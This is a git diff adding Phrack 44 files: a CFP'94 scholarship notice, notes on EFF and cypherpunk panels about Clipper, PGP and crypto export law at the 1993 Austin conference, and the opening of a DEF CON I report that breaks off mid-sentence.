+enforcement personnel, privacy advocates, "hackers", sociologists,
+educators and students, computer professionals, cryptography advocates,
+government policy makers and other interested parties have all played
+major roles in the three previous conference.
+
+Speakers at previous conferences have included Electronic Frontier
+Foundation (EFF) co-founders John Perry Barlow and Mitch Kapor, FBI Deputy
+Director William A. "Al" Bayse, writer Bruce Sterling, privacy advocate
+Simon Davies, Harvard University law professor Lawrence Tribe, hacker
+"Phiber Optik", Georgetown University's Dorothy Denning, "Cuckoo's Egg"
+author Clifford Stoll, Prodigy counsel George Perry, USA Today founder Al
+Neuwith, former FCC Chairman Nicholas Johnson, Computer Professionals for
+Social Responsibility (CPSR)'s Marc Rotenberg, Arizona prosecutor Gail
+Thackeray, and Bay Area Women in Computing's Judi Clark.
+
+The scholarships are intended to provide access to the conference to those
+that would like to attend the conference but are unable to afford the
+tuition. They are available to undergraduate and graduate students in any
+discipline (previous student attendees have come from computer science,
+law, sociology, liberal arts, journalism, and womens' studies
+backgrounds), law enforcement personnel, hackers, social scientists, and
+others interested in the future of the information society.
+
+Persons interested in a scholarship should send the following information
+(e-mail greatly preferred) to:
+
+John F. McMullen
+Perry Street
+Jefferson Valley, NY 10535
+
+mcmullen@panix.com
+(914) 245-2734 (voice)
+(914) 245-8464 (fax)
+
+1. Personal Information -- Name, Addresses (including e-mail), Phone
+Numbers, School and/or Business Affiliation
+
+2. Short Statement explaining what the applicant helps to get from CFP'94
+and what impact that attendance may have in the applicant's community or
+future work.
+
+3. Stipulation that the applicant understands that he/she is responsible
+for transportation and lodging expenses related to the conference. The
+scholarship includes tuition and those meals included with the conference.
+
+4. Stipulation that the applicant would not be able to attend the
+conference if a scholarship is not granted. The applicant stipulates
+that, if granted a scholarship, he /she will attend the conference.
+
+6. Stipulation that the applicant, if granted a scholarship, will provide
+a contact John McMullen at the above e-mail address or phone numbers with
+any questions.
+
+The number of available scholarships will be determined by funding available.
+
+-------------------------------------------------------------------------------
+
+Notes from the Austin Crypto Conference, September 22, 1993
+
+by Gregory W. Kamen
+
+--- Dinosaur Warning ---
+
+Disclaimer:  A lot of people here noted disclaimed what they said as "not
+legal advice".  In addition, this was prepared from notes which were not
+necessarily legible or complete, therefore I disclaim any responsibility
+for misquoting or mistranscribing this information.  (If you don't like
+it, you try typing "cypherpunks" over and over again :P).  Please note
+that in Q & A sessions, the answers were relevant, though not always
+responsive to the questions.  In addition, I state that this information
+does not represent legal advice from me or solicitation of legal
+representation, and does not necessarily represent the position of EFH,
+EFF, EFF-Austin, the individual conference participants, or any living
+person.
+
+-----------
+
+The room was set up to seat approximately 180 people.  It was essentially
+full, and there were a few people standing--not bad for a Wednesday
+afternoon.
+
+There was a large (about 14 people) contingent from EFH present.
+
+Steve Jackson opened the meeting with a few introductory remarks, among
+which were that a subpoena had been served on Austin Code Works, a
+publisher of cryptographic software.
+
+We can expect to hear about the case in news magazines of general
+circulation in about two months.
+
+Bruce Sterling delivered the keynote address.
+
+He began by establishing a context by defining cryptography:
+
+     -- as secret coding to avoid the scrutiny of a long list of entities,
+     -- as a way to confine knowledge to those initiated and trusted,
+     -- as a means to ensure the privacy of digital communication, and
+     -- as a new form of information economics
+
+Sterling then noted that crypto is "out of the closet"
+
+     -- it is heard of on the streets
+     -- the government acknowledges it by bringing forth its Clipper chip
+     -- it is in the hands of the people
+     -- public key crypto is out there and commercially available
+     -- the typical time to market from first publication of a new idea is
+20 years.  Diffie published the first public key crypto algorithm in 1975,
+thus the target date for mass crypto would be 1995.  Bringing it to market
+will require bringing of political pressure, lawsuits, and money.
+
+Next, Sterling moved to the subject of the grand jury proceedings in San
+Jose on 9/22.
+
+     -- Export law violations have been alleged.  Whatever the outcome,
+this proceeding is certainly not the end of the subject.
+
+Finally, before closing by noting that EFF-Austin is not EFF, Sterling
+shared a brief background of the panelists:
+
+     -- they are people who can tell us about the future
+     -- they are directors of national EFF and can share information
+Panelists on First Panel
+     -- Mitch Kapor - co-founder of EFF, software designer, entrepreneur,
+journalist, philanthropist, activist.  He spoke out on obscure issues in
+the beginning and made them seem less obscure.  He has done good deeds for
+the public.
+     -- Jerry Berman - President of EFF, activist background, published
+widely on security and privacy issues, formerly active with ACLU, and is
+on Clinton administration's National Information Infrastructure team.
+Panelists on Second Panel
+     -- Esther Dyson - journalist, has widely read project "Release 1.0",
+is a guru in Europe.
+     -- Mike Godwin - lawyer for EFF, veteran public speaker, attended UT-
+Austin, on the board of EFF-Austin as well as EFF.
+Panelists on Third Panel
+     -- Eric Hughes - not EFF member, started cypherpunks mailing list,
+from California
+     -- John Gilmore - 20 year programmer, pioneer at Sun, civil
+libertarian
+     -- John Perry Barlow - co-founder of EFF, media junkie, and author.
+
+PANEL #1:  POLICY
+
+Kapor - Opening remarks:  Framing the issue
+
+     a. Series of conferences in Washington, briefed EFF on how laws are
+made, at a technical level of the process.  Berman was instrumental in
+passing the ECPA, which was later used successfully in Steve Jackson Games
+case.
+     b. ECPA is a good thing: it says Email should be as private as postal
+mail.  However, it doesn't go far enough because it is easy to listen in
+on cell phones.
+     c. Kapor felt need technology to protect privacy.  Laws alone are not
+enough.  Berman stated view (at that time.  He has since changed his mind)
+widely held within the Beltway that laws were sufficient.
+     d. Survey:  20 percent of those present use PGP.  80 percent have
+heard of PGP.
+
+Berman -
+
+     a. Following on Kapor's point that ECPA was soft, Berman says the
+politicians will remain clueless until we educate them.  If it is
+knowledge that can alter the political process, it must be done.
+     b. EFF established a Washington presence because policy is being made
+to design and govern the electronic frontier by the big commercial
+players.  The public and the consumer are not represented.
+     c. We're working on a goal that the national information
+infrastructure serve the public interest.  For example, if the big players
+are allowed to dominate the process, they will control access and the NII
+will look like 500 cable channels rather than a point-to-point switched
+network like Internet.
+     d. There's a big battle coming:  computers and communication are in
+abundance such that everyone can be a publisher.  This raises at the very
+least a First Amendment issue.
+     e. The Clipper Chip
+     -- has great potential for the net; however, government agencies are
+not sure of control
+     -- privacy and security are essential for development of the national
+information infrastructure.  This is a threat to the law enforcement
+community.
+     -- the response of the law enforcement community has been to attempt
+to throttle the technology.
+     -- in order to capture the future, they want to develop the
+technology themselves.
+     -- EFF's role has been to say that we shouldn't go ahead with the
+Clipper chip proposal.
+     -- the ultimate big question:  What to do when all communications are
+encrypted.
+     -- Clinton led off with a study of cryptography policy and introduced
+the Clipper chip at the same time, which demonstrates that the policy was
+already determined in the opinions of many.  It was introduced not as
+something being studied, but as a fait accompli.
+     -- Clipper proposal is bad because it is based on a secret algorithm
+which has not been subjected to adequate scrutiny, it is counterintuitive
+to interoperability because stronger crypto is being developed outside the
+United States, and it includes a key escrow provision that includes only
+"insiders" who developed the technology.
+     -- We don't prescreen the content of communications.  The law
+enforcement community needs a warrant.  That is fundamental to the First,
+Fourth, and Fifth Amendments.
+     f. We oppose the Clipper/Skipjack chip
+     -- there's no evidence showing that law enforcement will be unduly
+hampered in its efforts to stop crime if crypto is available.
+     -- the positive and negative implications of widespread crypto have
+not been considered.
+     -- law enforcement may have a problem, but if they have a warrant
+they should be able to get access.
+     -- as long as Clipper is not mandated, people can use other types of
+crypto.
+     g. Conclusions
+     -- if Clipper is voluntary, it doesn't work, because people who want
+to encrypt safely will use other products.
+     -- if Clipper is mandated, there are serious constitutional issues.
+     -- Even if the Clipper chip proposal fails, we still lose under the
+current scheme, because the export control laws guarantee that we will not
+have crypto interoperable with the rest of the world.
+     h. EFF chairs a large coalition including representatives of
+Microsoft, IBM, and ACLU to work against this.
+     i. Congress only needs one bad case, like a terrorist attack, to go
+the other way.
+
+Q & A -
+
+Q. Is the key in the hardware or software with Clipper?
+
+A. It's in the hardware, therefore the instrument is permanently
+compromised once the keys are released from escrow.  The law enforcement
+arguments are really fronts for NSA and their religious commitment to
+prevent the spread of crypto.  It's NSA's mission to make sure it "busts"
+every communication in the world, therefore why would they propose any
+encryption without a "back door" through which they could decipher all
+transmissions.
+
+Q. What is the current state of the law between NIST and NSA?
+
+A. NSA was selling "secure" phones.  They wanted a new classification of
+information.  Responsibility for classified systems rests with NSA.  NIST
+is brought in to handle domestic crypto.  In terms of budget and
+experience, however, NSA is dominant, and NIST relies on them.
+
+Q. How does GATT relate to the Clipper proposal
+
+A. It's not dealt with in GATT.  There's no agreement on an international
+standard.
+
+Q. What's going on with PGP?
+
+A. Pretty Good Privacy is the people's crypto.  It was independently
+developed, and has been widely distributed for our information and
+security.  There are two current controversies regarding PGP.  First is
+whether it is subject to export controls, and second is its intellectual
+property status.
+
+Q. What facts do we have regarding the history of Clipper?
+
+A. The project began during the Bush administration after AT&T introduced
+phones implementing DES, the Data Encryption Standard.  Clinton looked at
+it early in his administration.  NSA pushed the program, and the staff
+wanted to "do something".  A worst-case scenario about the introduction of
+Clipper is that it was leaked to the press, and the story about a study
+was cooked up to cover the leak.  People might be surprised about how
+little expertise and thought about issues goes on.  Policy makers operate
+under severe time constraints, handling the crisis of the moment.  Most of
+them are reasonable people trying to do the best thing under the
+circumstances.  If we push certain ideas long enough and hard enough we
+can affect the outcome.
+
+Q. Following the _AMD v. Intel_ case, there's nothing stating you cannot
+clone the Clipper chips to circumvent the law enforcement field, correct?
+
+A. It's difficult to say.  The chips have not yet been delivered.  There
+have been technical problems with the chip.  At NIST hearing a couple
+weeks ago, Dorothy Denning revealed that she had reviewed the Skipjack
+algorithm alone because the other four cryptographers selected to review
+the algorithm were on vacation.  There's a certain degree of cynicism
+because the government has said it will twist people's arms using its
+purchasing power and the threat of prosecution to establish Skipjack as a
+de facto standard.  EFF is trying to get AT&T and Motorola to do
+something.  Maybe the chip cannot easily be cloned.  John Gilmore wants to
+see how easy it is to reverse engineer.
+
+Q. What are specific steps that can be taken?
+
+A. Send Email to the White House, and cc to EFF.  Also, focus on the
+debate concerning ownership and leasing of the national information
+infrastructure.  Southwestern Bell wants authority to own and lease the
+net and isn't quite sure whether government should be involved.  This is
+the other longest-running EFF policy concern:  the owner of the electronic
+highways shouldn't be able to control content.  Bandwidth should be
+provided based on the principles of common carriage and universal access.
+Construction of the NII should be done by the private sector because
+government doesn't have the resources available.  We can't allow ourselves
+to be limited to upstream bandwidth.  The net should retain those of its
+characteristics equivalent to BBS's.
+
+Q. If NIST is to be an escrow agent, why are they not secure?
+
+A. This is a source of moral outrage, but moral outrage only goes so far.
+We need to swallow our distaste for dealing with the government to
+compromise.  It is worthwhile to get involved in the decision-making
+_process_.
+
+Q. What is the position of the ACLU and Republican think tanks on Clipper?
+
+A. A lot of organizations have bumped into NII.  ACLU is fighting the
+Clipper chip.  For other organizations, it's not a top priority item.
+
+Q. With regard to DES:  Export restrictions apply to scramblers, but they
+are exported anyway.  Why this policy of selective enforcement?
+
+A. Don't look for consistency.  SPA has recognized that there are 231 DES-
+equivalent products.  The genie is out of the bottle.  DES source is
+widely available, but more so inside the US than outside.
+
+Q. If the government has their way, what good products are out there for
+us?
+
+A. The government can only have its way by mandating use of Skipjack.  If
+it holds up, legally and politically, there _is_ no alternative.  The
+government is saying that it is considering banning the use of crypto
+other than Skipjack, but has not yet adopted such a policy.
+
+Q. If crypto is a munition, is it protected under the Second Amendment?
+
+A. The Second Amendment probably doesn't affect the export question.
+
+Q. Are there any legal weaknesses in the public key cryptography patents?
+
+A. EFF has its hands full with other issues and hasn't really formulated
+an answer to this, but believes there's a fatal weakness as to all
+software patents.  However, it would be prohibitively expensive to make
+such a case at this time.
+
+Q. Do we need different copyright laws because of encryption?
+
+A. Recognize that without changes in the copyright law, it will be
+difficult to get a true net economy going.  Producers want a way to make
+money from the net.  Consumers want the equivalent of home taping.  It's
+tough to cover all the bases.
+
+Q. How do law enforcement issues in civil cases relate?
+
+A. This is an interesting point because the line between a commercial
+dispute and a criminal act are fuzzy.  There are dangers in obtaining a
+wiretap.  The law enforcement community shouldn't have a case to tap a
+line in the event of a two-party dispute.  There is a danger of misuse for
+traffic analysis of calls.
+
+Q. ECPA could have been used to regulate access to the airwaves.  Has it
+been tested against the First Amendment?
+
+A. This demonstrates that technological security measures, rather than
+merely laws, are needed.  People have listened to cell phone calls with
+scanners, and they made scanners illegal to manufacture, but cell phones
+can be modified to act as scanners.  Experimentation of privacy with
+encryption shifts the balance.  RSA is available outside the US.  RICO is
+being overused.
+
+PANEL #2:  INDUSTRIAL AND LEGAL ISSUES
+
+Dyson - Beyond commercial people being citizens, there are three big
+issues:
+
+1. Protection of trade secrets
+2. Intellectual property protection for net businesses and database
+information
+3. Exporting encryption devices: US businesses like to do business
+overseas.  It is cost ineffective to develop a US-only standard.  There is
+better encryption available in Russia and Bulgaria on BBS's.
+
+Godwin - Talking about law enforcement arguments government makes.  There
+are general issues regarding computers, communication, and privacy greater
+than just Clipper.
+
+     -- Godwin is the first person people talk to when they call EFF in
+trouble.  In addition to giving a lot of general information regarding
+liability, he monitors the intake of cases for EFF.  He talks at
+conventions about criminal and constitutional issues.
+     -- This effort has produced at least one change already:  law
+enforcement personnel are no longer completely incompetent and clueless
+about computers.
+     -- the most interesting are issues dealing with hackers and crypto.
+FBI's involvement with digital telephony:  they wanted to make it more
+wiretap friendly.  They discovered it is worthless without a restriction
+on encryption, and Clipper was introduced a short time later.
+
+Legal History
+
+     The right to communications privacy is a fairly new thing.  The
+Supreme Court faced it in the 1928 _Olmstead_ case, and held that
+there was no Fourth Amendment interest to be protected at all because
+there was no physical intrusion on the property.  The doctrine has bee
+reveisited a number of times since then.
+     -- a suction cup mike next door to the defendant's apartment produced
+the same holding.
+     -- In a later case of a "spike mike" penetrating the heating duct of
+the defendant's apartment, the Court held that the Fourth Amendment
+applied but did not extend general Fourth Amendment protection.
+     Finally in the _Katz_ case in the late 60's the Court formulated its
+present doctrine in holding that the defendant has a reasonable
+expectation of privacy in a phone booth.  The Court said that the Fourth
+Amendment protects people, not places.  Justice Brandeis, in dissent,
+cited Olmstead, but also noted that "The right most prized by civilized
+men is the right to be let alone."
+
+Arguments regularly advanced by law enforcement types in favor of Clipper:
+
+1. Wiretapping has been essential in making many cases.
+     -- this argument seems reasonable.
+
+2. Even if they can't point to a case now, they are taking a proactive
+approach, trying to anticipate problems rather than reacting.
+     -- Dorothy Denning was involved early on in framing the issues.  Now
+she's in favor of the government line.  Point is that an attitude of "us
+vs. them" is counterproductive.
+
+3) There are nuclear terrorists out there
+     -- this argument is the result of false reasoning.  Like Pascal's
+wager, the price of guessing wrong is so high that the rational person
+chooses to be a believer, even where the probability is very low.
+     -- the problem with it is that you can't live that way.  There's not
+necessarily one single right answer.  Also there is a substantial
+opportunity cost.  Whenever you empower individual rights, there's a
+tradeoff against government efficiency.  As an example, take the case of
+compelled confession.  It would be very efficient for the government to be
+able to compel a confession, but the cost in individual rights is too
+high.  There is no constitutional precedent on which to base the outlawing
+of encryption.  The way it ought to be, the law enforcement types should
+have the right to try to intercept communications under certain
+circumstances, but they should have no guarantee of success.
+
+4) Wiretapping has created an entitlement to have access to the
+communications:  this argument is blatantly ridiculous.
+
+Q & A
+
+Q. Before the A-bomb was built, proponents said that it would cost $1
+million to build.  The eventual cost was $1 billion.  Congress asked what
+was the probability that it could work, and was told 1 in 10.  Thus the
+nuclear terrorist argument works, right?
+
+A. Terrorists won't use Clipper
+
+Q. NSA has had scramblers working.  Why does it hurt for us to have the
+devices?
+
+A. We're not opening Pandora's Box.  Encryption is already out there.
+They think the majority of communications are not encrypted now.
+Encryption will create a bottleneck, which will change the way law
+enforcement does its job.
+
+Q. What about the Davis case in Oklahoma? If convicted is there any chance
+for parole?
+
+A. Davis was a BBS owner prosecuted because he allegedly had obscene
+material on his board.  I don't know about Oklahoma parole law.
+
+Q. What is the current legal status of PGP?
+
+A. That will be answered later.
+
+Q. If "only outlaws will have crypto", how effectively can the clamp down?
+
+A. It will probably be very easy for them to chill nonstandard crypto if
+     -- they investigate for another crime and find it, or
+     -- it may itself be probable cause for a search.
+
+Q. Doesn't a lot of this boil down to "you wouldn't be encrypting if you
+had nothing to hide"?
+
+A. There's not any probable cause for law enforcement taking that
+position.  Business likes crypto.  In a scenario where only certain types
+of crypto are allowed, there could presumably arise a presumption from
+nonstandard crypto.  The more people who encrypt, the more will say it is
+all right.
+
+Q. Do you get the sense that there is a political will to protect privacy
+in this country?
+
+A. It is not clear that is the case.  There is a real education hurdle to
+teach the importance of technology.
+
+Q. The law enforcement aspect is not important to NSA, right?
+
+A. The Russians and the Japanese have done more theoretical work.  Read
+"The Puzzle Palace"
+
+Q. Virtual communities and net businesses need crypto on all systems to
+validate digital signatures.
+
+A. It is not required universally.  It will become cheaper as digital
+signatures take off.  The Clipper proposal does not address digital
+signatures.  NIST is also talking to IRS about helping implement Clipper
+by extending the ability to file tax returns electronically to those using
+Clipper.
+
+Q. What restrictions are there right now on the IMPORT of crypto?
+
+A. None right now.
+
+Q. Is law enforcement misuse of commercial information anticipated?
+
+A. It is a wash.  There are laws available to protect against such things,
+like the Electronic Funds Transfer laws, and also that the wiretap law
+requires eventual notification of the tap.  That's why they have called
+for two escrow agents.  The weakness is that people can be compromised.
+The answer to law enforcement is that you could have more than two escrow
+agents to make the bribe prohibitively expensive.  Also the problem of
+human weakness is not unique to the Clipper chip or key escrow systems.
+
+Q. There's no mapping between the chip and the phone, correct?
+
+A. The only link is the word of the officer seeking a warrant.  There is
+no provision right now for a database containing identities of all chips.
+
+Q. Can the President or Congress outlaw encryption by Executive Order?
+
+A. The president cannot by Executive Order.  It's not clear whether
+Congress could constitutionally.
+
+Q. What about steganography?
+
+A. Steganography is defined as a message appearing to be unencrypted but
+containing a code.  There's a constant competition between the law
+enforcement community and the criminal element to stay ahead on the
+technology.
+
+Q. Are one time pads illegal, or covered by export regulations?
+
+A. No.  Few policymakers have ever heard of them.
+
+Q. What's a vision of what we would like to see?
+
+A. Try to give people a technological means to protect their own privacy.
+Freedom to exchange information.  Communities conforming to a standard
+without oversight, so that we can export.
+Godwin - more mystical approach.  In person, you can be sure of someone's
+identity.  This creates intimacy.  Technology has the potential to free
+intimacy from the accident of geography.  With crypto, you know the
+identity of the other person, and that you're not being overheard.
+
+Q. Who are the law enforcement people you've been dealing with?  Do they
+represent the highest levels of their organizations?
+
+A. (Godwin) I don't claim to know what NSA thinks.  I have talked to FBI,
+state and local law enforcement authorities, and they all say the same
+things.
+
+PANEL #3:  CYPHERPUNKS
+
+Barlow - Doesn't have the I/O bandwidth to be a cypherpunk.  Doesn't know
+how they do it.  The net is the biggest technological development since
+fire.  There's a very difficult choice to be made, and it may already be
+made:  Either anything is visible to anyone who is curious, or nothing is
+visible.  Barlow comes from a small town.  He's not bothered by privacy
+invasions at that level.  But there's a difference between locals and the
+possessors of a database.
+     The problem of giving up privacy (which without encryption will
+happen), is that it allows "them" to protect us from ourselves.  Also, no
+matter how benevolent the current government may be, there will always be
+a corrupt one down the road.  Hidden crypto economies could break most
+governments.  It's not necessarily good to have no government either.
+     What drives the cypherpunks is a law of nature:  Anarchy is breaking
+out, and Barlow is one.  However, the libertarian impulse begs a few
+questions about crypto: What are we trying to hide, from whom, and why?
+     There are a lot of victimless crimes out there for which no one wants
+to take responsibility.
+     Barlow wants crypto to create trust in identity.  The real cypherpunk
+question is:  The war is over, and we have won.  How do we make the
+transition of power graceful?  Human nature is to acquire some power
+structure of some kind.  It is critical to acquaint friends and those who
+could care less with crypto.
+
+Gilmore - There are too many laws, and they make the wrong things illegal;
+We need to explain.  In the existing system, the natural outgrowth has
+been for cypherpunks to be labeled as "them".  Gilmore's vision is
+unprecedented mobility by creating privacy and authenticity at a distance.
+Thus you don't have to live near work, or play near home.  By focusing on
+conspirators, the law enforcement community loses the focus on business
+use.  The formal topic of the panel is cypherpunks.
+     -- Crypto is not all that hard.  Denning's book shows how to
+implement DES and RSA.
+     -- Cypherpunks push the limits - taking cryptography from theory into
+the realm of the practical.
+     -- Trying to put crypto in the hands of the people, so that the
+government cannot take it back.  That's why PGP is freely distributed.
+     -- Also working on anonymity and digital money schemes.
+The areas the cypherpunk group has worked on are:
+     1) Anonymity - anonymous Email.  What is the impact on how we
+communicate?  Most of the debate has been relatively uninformed.  The
+Supreme Court thinks there is a right of anonymity.  A Los Angeles law
+requiring that demonstrators who handed out flyers put their name and
+address on the flyers was overturned on the grounds that it chilled free
+speech.  In other media, telephones are anonymous.  There has been a big
+ruckus with Caller ID.  The postal service does not enforce return address
+requirements.  Telegrams and radio are similarly anonymous.
+     2) Privacy - Have been implementing key exchange systems for PGP,
+experimenting with encrypted audio.  Digital cash systems - so many
+businesses would pop up on the net if it was possible to spend electronic
+money.  There are people working on the legal aspects of it now.
+     3) Outreach - a mailing list, contributing articles to Village Voice,
+Wired, Whole Earth News.
+     4) Government interaction - Sent a list of questions regarding
+Clipper to NIST.  Made several requests under the Freedom of Information
+Act.  Someone searched the dumpsters at Mykotronx.  In a recent FOIA
+request to an Assistant Secretary of Defense, we learned that the law
+enforcement and intelligence communities advocate making Clipper
+mandatory.  There's a FOIA request in now on Clipper.  FBI returned a
+clipping file, but says it will take 3 1/2 years to process and release
+all the documents requested.
+     5) Future projects - Building encrypted phones using PGP.  Real
+digital banking.  Automating anonymity and making an easier to use
+interface for anonymized mail.  Tightening security from machine to
+machine protocols - Right now they transmit cleartext.  At Gilmore's home
+machine at Cygnus recently, a hacker monitored a session remotely, then
+installed a daemon to monitor the first 200 bytes of ethernet traffic from
+each connection.  The daemon was removed, and the problem fixed using
+kerberos.
+
+Hughes - Cypherpunks was created by Hughes and Tim May.  It's surprising
+how much media attention we have gotten.  They knew what they were doing
+was significant, but not that so many people thought so.  They are now
+shooting a pilot for a TV show based on cypherpunks, and Hughes has held
+himself out as a media expert.  Here are a few obvious things that
+nonetheless need to be stated:
+
+     1) In order to have a private key, you need to have your own CPU.  To
+put your key online where someone else has physical access is dumb.
+Therefore, one of the consequences is that digital privacy is only for the
+rich.
+     2) Cypherpunks is not a "hacker privacy league", but rather seeks to
+ensure privacy for all.  Crypto must be easy to use.  It is just now
+feasible to have an anonymous remailer.  The user interface _must_ be
+easy.  The layperson's concept of security is that if the computer is not
+networked, it is secure.  They don't see how much of a disadvantage it is
+not to be networked.  Gibson calls non-networked computers "dead silicon".
+Therefore, encryption needs to be transparent to the user.  The
+cypherpunks mailing list reached critical mass about 2 months ago with
+enough people understanding the concepts to move forward.  We're at a
+crossroads historically now.
+     3) If you're the only one using crypto, it must be you who sent the
+cryptographic message.  Anonymity is a social construct, and it doesn't
+work unless many people do it.  The government is good at suppressing
+small things, but bad at suppressing big things.  Therefore the best
+course of action is to spread the word.  In the end, most of us will be
+private or most will not.  If encryption is available to you, use it.
+
+In response to Dyson on the question of copyright:  Copyright is dead, or
+at least moribund.  It will not exist as we know it in 100 years.  It is
+a means of using the government's power to suppress expression.  You still
+will be able to sell the timeliness of information, indexing, delivery,
+etc.
+
+Gilmore - If we decide to be private, the only limit to secrecy is
+individual conscience.
+
+Comments from the audience:
+
+     -- As it becomes less possible to hold on to information, marketing
+shifts toward a relationship rather than a product.
+     -- If we want to make encryption easy, put out a mailer which
+supports it.  (Response: We're working on it)
+
+Q & A
+
+Q. Can public keys be made available through the Domain Name Servers?
+
+A. PGP developers are working on it.  Internet is an information motel.
+Data checks in, but it doesn't check out.
+
+Q. Is it possible to keep secrets at all?
+
+A. The larger an organization is, the tougher it is to keep a secret.
+Secrecy and digital signatures are not exactly related.  One thing we may
+see if pointers to specific documents which contain self-verifying
+information.  These will change the balance of power.
+
+Q. Can we sell strong crypto to Clinton as part of his national ID card
+for health care program?
+
+A. There's a problem in dealing with the administration right now, because
+they are currently defending a position and it will be tough to change.
+A parallel development may make the difference.  Congress is getting
+Email.  Seven or eight congressmen have access.  A push to implement
+crypto to determine who is from the districts represented should come
+soon.  A lot of this type application is based on the blind signature work
+of David Chaum.
+
+Q. What's the status with the legality of PGP vs. RSA?
+
+A. It is unsettled.  There are two issues: patent infringement and export.
+RIPEM uses RSAREF, which is a watered down version of RSA.  They're
+working on PGP using RSAREF for noncommercial users.
+
+Q. Compare the strength and security of PGP and RIPEM?
+
+A. PGP uses a longer key.  RIPEM uses DES, but will probably go to Triple-
+DES.
+
+Q. How are blind signatures used?
+
+A. Voter cards, digital signatures, digital money.  The government won't
+do it if they feel it's not in their best interest.  Push it.
+
+Q. Can NSA break DES & PGP?
+
+A. Of course.
+Q. How long must a key be to slow NSA down?
+
+A. We estimate they can break one 512 bit RSA modulus per day.
+
+Q. Is PGP illegal, and if so, how?
+
+A. Patent infringement issue is whether PGP infringes RSA.  If you use a
+product that infringes, you are civilly liable.  If they were to enforce
+against a random user, worst case is that the user might be tied up in the
+courts for a while.  Worse is copyright - it is a felony to engage in
+software piracy, which means making over 10 copies with a value over
+$2500.  This poses a potential problem for sysadmins, and now companies
+use the threat of criminal charges to force licensing.  Kapor is willing
+to take the case of whether or not there could ever be a valid software
+patent to the Supreme Court.  Godwin says prosecutors will use other laws:
+Wire fraud, conspiracy, RICO.
+
+Hughes - there should be a local cypherpunks chapter.  It should meet on
+the second Saturday of the month.  Hughes is pursuing the idea of
+teleconferencing.
+
+Hughes concludes: "There's plenty of arguing to do.  I'll see you online."
diff --git a/phrack44/7.txt b/phrack44/7.txt
new file mode 100644
index 0000000..b4f6bbe
--- /dev/null
+++ b/phrack44/7.txt
@@ -0,0 +1,623 @@
+                              ==Phrack Magazine==
+
+                Volume Four, Issue Forty-Four, File 7 of 27
+
+                                 Conference News
+
+                                     Part II
+
+****************************************************************************
+
+xxxxxxxxxxxxxxxxxx xxx xx x  xx              DEF CON I, Las Vegas 1993
+xxxxxxxXXXXxxxxxxxxxxxxx xx  x x          I'll attempt to give you guys
+xxxxxxXXXXXXxxxxx x   x     x        the real deal on what happened.  Since you
+xxxxxXXXXXXXXxxxxx xx   x x          most likely don't care about the whole
+xxxxXXXXXXXXXXxxx x  xxxxxxxx x      planning side of it I'll just talk about
+xxxXXXXXXXXXXXXxxxxxxxxxx  x         what happened of interest.
+xxXXXXXXXXXXXXXXxxxxxx   xx   x
+xxxXXXXXXXXXXXXxxxxxxxx              I showed up at the Sands Hotel later than
+xxxxXXXXXXXXXXxxxxxxxx  x x  xx      I thought, thanks to a delay at the
+xxxxxXXXXXXXXxxxxxxx xxx   xx  x     airport and a ride on the slowest hotel
+xxxxxxXXXXXXxxxxxxx x x  x           shuttle known to mankind.  It had to stop
+xxxxxxxXXXXxxxxxxxxxxx xx x x        at every other hotel before it made it to
+xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x     mine.  Oh well.
+
+    So I check in and go to check out the conference room, which happens to be
+right next to the conference planning room for the hotel.  "Hmm, they will be
+gone for the weekend though, so we should be safe," I think as I wander into
+"The Burgundy Room"  Sounds like a room in "Clue."  Anyway there are like maybe
+six other people there.  Dead Addict has been holding down the fort, and wanted
+to go get drinks so I set him free to frolic as I set up shop.  I handed out
+tags to the people who had shown up and settled in for the duration.
+
+    Someone had brought a cd player, so I put on a tape and got the music
+going.  Red Five was there sporting scanners and radio gear, this guy had wires
+sticking out all over the place.  "Good thing they turned to phones off," I say
+looking around the room happy that I wouldn't be stuck with a $31,312 phone
+call to Eastern Europe.  "Yeah, we already checked that one," said one of the
+"hammies" gesturing to the phone jack I had seen.  I notice a large cable
+running from the jack to a larger junction box at about the same time their
+eyes light up with glee.  "Get the handset!," one says as another advances on
+the box with a tool kit that appeared out of thin air.  "I'll need the ohm
+meter and some clips."  the box is dismantled, and three people swarm it in
+a line testing frenzy.  "No good on one.. two.. three.. got tone on four!"
+Great, I think, I'm fucked!  "hhmm.. seems to be just the hotel, can't get an
+outside line.."
+
+    This goes on for some time until I persuade them to stop fucking with the
+box and to do something else.  They give up bored, and start exploring the
+rooms next to us finding a hallway that leads to a security camera monitoring
+the casino tables below.  Some decide it's not cool to be recorded and return
+from there in a hurry, while others locate a travel agent's office and start
+grabbing a few things of no consequence.  We grabbed two large easels holding
+large pads of paper for people to draw/write on.
+
+    About this time the lady in charge of convention planning calls me to her
+office.  "We got a call from the communications room.  They said things were
+lighting up on their board that aren't supposed to be lighting up from your
+conference room.  They say if it doesn't stop that you'll be thrown out of the
+hotel."  Zowie.  "OK, I got them to stop.  They were just trying out their
+computer on the phone line to see if they could place a call," (Yeah, right)
+"but I'm sure it won't happen again."  The assistant in the office spoke up
+and said something like, "Well, if you can clear my credit card I'm sure we
+wouldn't mind!" To which the main lady, Moreen, said "Yeah, my name is Moreen
+Robinson, and my Social Security number is..."  What did they think?  "Yeah,
+I'll get my credit erasers on it right away!"??
+
+    Back at the room things started to pick up.  People came in throughout the
+day, and the bar downstairs was having a $1 margarita special.  Someone bought
+twenty drinks for everyone (All right!) and then we got a picture more of them.
+Metal Head went and got me a drink while he was out.  Things were looking good
+through this buzz of mine.  Judi Clark of the Bay Area CPSR showed up (one of
+the speakers) and was real cool.  She was jonesing for an internet connection,
+but we couldn't line one up with a slip connection for her.  She had brought
+some literature to distribute, too.
+
+    Around six or seven or so we had a pretty good crowd going, with more and
+more speakers showing up.  Ray Kaplan (Kaplan and Associates) drove like a
+maniac out of Arizona, and Dr. Ludwig (Author of Little Black Book of
+Computer Viruses) drove up with Merc from Arizona also.  It was about ten or
+so Friday night and people were getting to know each other.  Some more radio
+guys showed up, including the Jackal, and they were in another corner speaking
+in some other language.. stuff I won't even try to reproduce here.  It revolved
+around the best ways to pick up restricted channels and how not to be
+triangulated.  Cool.
+
+    Speculation was rising about what Gail Thackery would be like, and when
+Gillian from New Media Magazine showed up to cover the event people figured
+that she must be Gail.  Nope.  Gail showed up about a half hour later.
+Conversation in the room stopped, and all eyes were on Gail.  She didn't seem
+to notice, and came up and said hello.  I gave her a speakers id pass, and
+she went off to find a drink.  When she returned people started to talk to her,
+and by about midnight she was mobbed with people.  She had a captive audience
+at the back of the room and was fielding all types of questions.  Some guy was
+saying "Say, hypothetically, that you have 9 gigs all encrypted on your, re,
